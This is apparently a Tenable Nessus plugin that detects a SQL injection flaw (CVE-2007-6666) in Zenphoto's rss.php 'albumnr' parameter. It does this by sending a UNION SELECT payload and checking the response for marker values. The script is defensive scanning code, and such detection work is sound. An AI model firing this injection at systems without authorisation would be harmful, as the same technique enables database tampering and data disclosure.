#
# (C) Tenable Network Security, Inc.
#


if (description)
{
  script_id(29832);
  script_version("$Revision: 1.4 $");

  script_cve_id("CVE-2007-6666");
  script_bugtraq_id(27084);
  script_xref(name:"OSVDB", value:"39786");

  script_name(english:"Zenphoto albumnr Parameter SQL Injection Vulnerability");
  script_summary(english:"Tries to influence the RSS results returned");

  desc = "
Synopsis :

The remote web server contains a PHP script that is prone to a SQL
injection attack. 

Description :

The remote host appears to be running Zenphoto, a photo gallery
application written in PHP. 

The version of Zenphoto installed on the remote host fails to sanitize
input to the 'albumnr' parameter of the 'rss.php' script before using
it in a database query.  Regardless of PHP's 'magic_quotes_gpc' and
'register_globals' settings, an attacker may be able to exploit this
issue to manipulate database queries, leading to disclosure of
sensitive information, modification of data, or attacks against the
underlying database. 

See also :

http://www.milw0rm.com/exploits/4823

Solution :

Unknown at this time.

Risk factor :

High / CVSS Base Score : 7.5
(CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)";
  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2008 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("url_func.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);


# Loop through directories.
if (thorough_tests) dirs = make_list("/zenphoto", "/album", "/gallery", "/photos", cgi_dirs());
else dirs = make_list(cgi_dirs());

foreach dir (dirs)
{
  # Try to manipulate the RSS results returned.
  magic1 = unixtime();
  magic2 = rand();
  exploit = string("9999 UNION SELECT 0,0,0,", magic1, ",", magic2, ",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/*");

  req = http_get(
    item:string(
      dir, "/rss.php?",
      "albumnr=", urlencode(str:exploit)
    ), 
    port:port
  );
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
  if (res == NULL) exit(0);

  # There's a problem if...
  if (
    # it's ZenPhoto and...
    "ZenPhoto Album RSS Generator" >< res &&
    # we see our magic in the answer.
    string("<title>", magic1, "<") >< res &&
    string("/a>", magic2, "]]") >< res
  )
  {
    security_hole(port);
    exit(0);
  }
}
